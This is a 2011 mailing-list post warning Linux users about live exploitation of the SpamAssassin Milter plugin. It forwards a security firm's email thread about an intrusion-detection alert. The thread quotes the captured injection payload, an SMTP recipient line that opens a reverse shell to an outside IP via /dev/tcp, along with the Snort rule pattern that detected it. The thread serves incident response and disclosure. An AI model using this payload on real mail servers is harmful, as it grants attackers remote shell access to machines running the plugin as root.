No need for AV tools on Linux, eh?
jdow
jdow at earthlink.net
Thu Feb 10 21:06:19 UTC 2011
For all of you with your touching faith that Linux is invulnerable I
offer up this message from the Spam Assassin list. This is an exploit
into a piece of software running with root privileges - in your email
system.
{^_-}
-------- Original Message --------
Subject: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:42:40 -0500
From: Michael Scheidell
heads up:
if case you are using spamassassin milter:
active exploits going on.
<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>
Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
I don't see anything on bugtraq about a fix.
-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt
The rule is only looking for this:
content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
Personally, I would probably block it. Although, if we’re not seeing this
sort of thing pop up on customer’s boxes, a manual block in scanner2 is
sufficient for now, right?
Either way, let me know and I’ll block/unblock/leave alone.
--
John Meyer
Associate Security Engineer
>|SECNAP Network Security
Office: (561) 999-5000 x:1235
Direct: (561) 948-2264
*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt
is the snort rule specific enough that you can block the offending ip for 5
mins?
(if its a real smtp server, it will retry) and legit email through.
On 2/10/11 12:12 PM, John Meyer wrote:
I don’t like the looks of this. I blocked that IP with samtool.
Payload:
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
data
.
quit
--
John Meyer
Associate Security Engineer
>|SECNAP Network Security
Office: (561) 999-5000 x:1235
Direct: (561) 948-2264
*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-alert at scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin
Remote Arbitrary Command Injection Attempt
02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]
--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
>*| *SECNAP Network Security Corporation
·Certified SNORT Integrator
·2008-9 Hot Company Award Winner, World Executive Alliance
·Five-Star Partner Program 2009, VARBusiness
·Best in Email Security,2010: Network Products Guide
·King of Spam Filters, SC Magazine 2008
----------------------------------------------------------------------------
This email has been scanned and certified safe by SpammerTrap®.
For Information please see http://www.secnap.com/products/spammertrap/
----------------------------------------------------------------------------
More information about the users
mailing list